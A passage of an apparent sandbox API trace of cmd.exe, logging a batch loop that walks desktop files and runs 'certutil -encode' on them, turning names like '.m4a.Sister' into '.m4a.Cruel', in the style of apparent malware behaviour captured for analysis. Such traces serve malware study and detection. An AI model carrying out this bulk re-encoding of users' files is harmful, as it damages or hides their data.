\"KoSrfJhDHVv1O_ 2.m4a.Sister\" \"KoSrfJhDHVv1O_ 2.m4a.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"KoSrfJhDHVv1O_ 2.m4a.Sister\" \"KoSrfJhDHVv1O_ 2.m4a.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"KoSrfJhDHVv1O_ 2.m4a.Sister\" \"KoSrfJhDHVv1O_ 2.m4a.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1024, dwThreadId=0x1054)) returned 1 [0233.768] CloseHandle (hObject=0xa4) returned 1 [0233.768] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0233.768] GetProcessHeap () returned 0x21ed8c70000 [0233.768] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0233.769] GetEnvironmentStringsW () returned 0x21ed9980080* [0233.769] GetProcessHeap () returned 0x21ed8c70000 [0233.769] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0233.769] FreeEnvironmentStringsA (penv="=") returned 1 [0233.769] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0235.782] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0235.782] CloseHandle (hObject=0xa8) returned 1 [0235.782] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0235.782] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0235.782] GetProcessHeap () returned 0x21ed8c70000 [0235.783] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0235.783] GetEnvironmentStringsW () returned 0x21ed9980080* [0235.783] GetProcessHeap () returned 0x21ed8c70000 [0235.783] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0235.783] FreeEnvironmentStringsA (penv="=") returned 1 [0235.783] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0235.783] GetProcessHeap () returned 0x21ed8c70000 [0235.783] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0235.783] GetEnvironmentStringsW () returned 0x21ed9980080* [0235.783] GetProcessHeap () returned 0x21ed8c70000 [0235.783] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0235.783] FreeEnvironmentStringsA (penv="=") returned 1 [0235.783] GetProcessHeap () returned 0x21ed8c70000 [0235.783] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95920) returned 1 [0235.783] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0235.783] ??_V@YAXPEAX@Z () returned 0x1 [0235.783] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9bdbd0, ftCreationTime.dwHighDateTime=0x1d5ebdb, ftLastAccessTime.dwLowDateTime=0x2c541020, ftLastAccessTime.dwHighDateTime=0x1d5e64b, ftLastWriteTime.dwLowDateTime=0x2c541020, ftLastWriteTime.dwHighDateTime=0x1d5e64b, nFileSizeHigh=0x0, nFileSizeLow=0xc828, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="Mhg3G6nMJa5mU0.mp4.Sister", cAlternateFileName="")) returned 1 [0235.784] GetProcessHeap () returned 0x21ed8c70000 [0235.784] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c789e0, Size=0x390) returned 0x21ed8c78f20 [0235.784] GetProcessHeap () returned 0x21ed8c70000 [0235.784] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c78f20) returned 0x390 [0235.784] GetProcessHeap () returned 0x21ed8c70000 [0235.784] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68ff0 [0235.784] GetProcessHeap () returned 0x21ed8c70000 [0235.784] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68ff0, Size=0x58) returned 0x21ed8d68ff0 [0235.784] GetProcessHeap () returned 0x21ed8c70000 [0235.784] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68ff0) returned 0x58 [0235.784] GetProcessHeap () returned 0x21ed8c70000 [0235.784] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69060 [0235.784] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0235.784] GetProcessHeap () returned 0x21ed8c70000 [0235.784] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x44) returned 0x21ed8c7ba80 [0235.784] ??_V@YAXPEAX@Z () returned 0x1 [0235.784] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0235.784] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cee0 [0235.785] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0235.785] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0235.785] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0235.785] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb6c24511, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb6c24511, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cb80 [0235.789] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0235.789] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Mhg3G6nMJa5mU0.mp4.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9bdbd0, ftCreationTime.dwHighDateTime=0x1d5ebdb, ftLastAccessTime.dwLowDateTime=0x2c541020, ftLastAccessTime.dwHighDateTime=0x1d5e64b, ftLastWriteTime.dwLowDateTime=0x2c541020, ftLastWriteTime.dwHighDateTime=0x1d5e64b, nFileSizeHigh=0x0, nFileSizeLow=0xc828, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Mhg3G6nMJa5mU0.mp4.Sister", cAlternateFileName="MHG3G6~1.SIS")) returned 0x21ed8c7cfa0 [0235.789] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0235.789] _wcsnicmp (_String1="MHG3G6~1.SIS", _String2="Mhg3G6nMJa5mU0.mp4.Sister", _MaxCount=0x19) returned 16 [0235.789] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0235.789] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0235.789] GetProcessHeap () returned 0x21ed8c70000 [0235.789] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8810 [0235.789] ??_V@YAXPEAX@Z () returned 0x1 [0235.790] ??_V@YAXPEAX@Z () returned 0x1 [0235.790] GetProcessHeap () returned 0x21ed8c70000 [0235.790] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69060, Size=0x210) returned 0x21ed8d69060 [0235.790] GetProcessHeap () returned 0x21ed8c70000 [0235.790] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69060) returned 0x210 [0235.790] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0235.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0235.790] GetFileType (hFile=0x50) returned 0x2 [0235.790] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0235.790] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0235.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0235.825] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0235.857] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0235.857] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0235.857] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0235.857] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0235.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0235.857] GetFileType (hFile=0x50) returned 0x2 [0235.857] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0235.857] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0235.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0235.868] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0235.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0235.927] GetFileType (hFile=0x50) returned 0x2 [0235.927] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0235.927] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0235.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0235.928] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d69000*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d69000*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0235.928] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"Mhg3G6nMJa5mU0.mp4.Sister\" \"Mhg3G6nMJa5mU0.mp4.Cruel\" ") returned 64 [0235.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0235.929] GetFileType (hFile=0x50) returned 0x2 [0235.929] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0235.929] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0235.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0235.929] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x40, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x40) returned 1 [0235.930] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0235.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0235.930] GetFileType (hFile=0x50) returned 0x2 [0235.930] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0235.930] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0235.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0235.930] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0235.939] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0235.940] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0235.940] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0235.940] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0235.940] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0235.940] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0235.940] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0235.940] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0235.940] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0235.940] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0235.940] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0235.940] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0235.940] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0235.940] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0235.940] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0235.940] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0235.940] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0235.940] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0235.940] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0235.940] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0235.940] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0235.940] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0235.940] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0235.941] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0235.941] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0235.941] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0235.941] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0235.941] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0235.941] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0235.941] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0235.941] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0235.941] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0235.941] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0235.941] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0235.941] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0235.941] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0235.941] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0235.941] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0235.941] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0235.941] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0235.941] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0235.941] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0235.941] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0235.941] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0235.941] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0235.941] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0235.941] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0235.941] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0235.941] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0235.942] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0235.942] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0235.942] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0235.942] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0235.942] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0235.942] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0235.942] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0235.942] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0235.942] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0235.942] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0235.942] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0235.942] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0235.942] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0235.942] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0235.942] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0235.942] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0235.942] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0235.942] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0235.942] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0235.942] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0235.942] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0235.942] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0235.942] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0235.942] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0235.942] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0235.942] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0235.943] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0235.943] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0235.943] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0235.943] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0235.943] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0235.943] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0235.943] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0235.943] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0235.943] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0235.943] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0235.943] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0235.943] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0235.943] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0235.943] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0235.943] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0235.943] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0235.943] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0235.943] ??_V@YAXPEAX@Z () returned 0x1 [0235.943] GetProcessHeap () returned 0x21ed8c70000 [0235.943] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92d1270 [0235.944] GetProcessHeap () returned 0x21ed8c70000 [0235.944] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa2) returned 0x21ed8d42a30 [0235.944] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0235.944] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0235.944] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0235.944] GetProcessHeap () returned 0x21ed8c70000 [0235.944] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed92e1260 [0235.945] SetErrorMode (uMode=0x0) returned 0x0 [0235.945] SetErrorMode (uMode=0x1) returned 0x0 [0235.945] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed92e1270, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0235.945] SetErrorMode (uMode=0x0) returned 0x1 [0235.945] GetProcessHeap () returned 0x21ed8c70000 [0235.945] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92e1260, Size=0x52) returned 0x21ed92e1260 [0235.945] GetProcessHeap () returned 0x21ed8c70000 [0235.946] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92e1260) returned 0x52 [0235.946] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0235.946] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0235.946] GetProcessHeap () returned 0x21ed8c70000 [0235.946] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5f0d0 [0235.946] GetProcessHeap () returned 0x21ed8c70000 [0235.946] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8c789e0 [0235.946] GetProcessHeap () returned 0x21ed8c70000 [0235.946] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c789e0, Size=0x1be) returned 0x21ed8c789e0 [0235.946] GetProcessHeap () returned 0x21ed8c70000 [0235.946] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c789e0) returned 0x1be [0235.946] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.946] GetProcessHeap () returned 0x21ed8c70000 [0235.946] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c76660 [0235.946] GetProcessHeap () returned 0x21ed8c70000 [0235.946] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c76660, Size=0x7e) returned 0x21ed8c76660 [0235.946] GetProcessHeap () returned 0x21ed8c70000 [0235.946] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c76660) returned 0x7e [0235.946] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.946] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0235.947] GetLastError () returned 0x2 [0235.947] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.947] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0235.947] GetLastError () returned 0x2 [0235.947] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.947] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ce80 [0235.948] FindClose (in: hFindFile=0x21ed8c7ce80 | out: hFindFile=0x21ed8c7ce80) returned 1 [0235.948] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0235.948] GetLastError () returned 0x2 [0235.948] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0235.948] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0235.948] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0235.948] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0235.948] ??_V@YAXPEAX@Z () returned 0x1 [0235.948] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0235.949] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0235.949] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0235.949] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0235.949] GetProcessHeap () returned 0x21ed8c70000 [0235.949] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e60 [0235.949] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0235.949] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 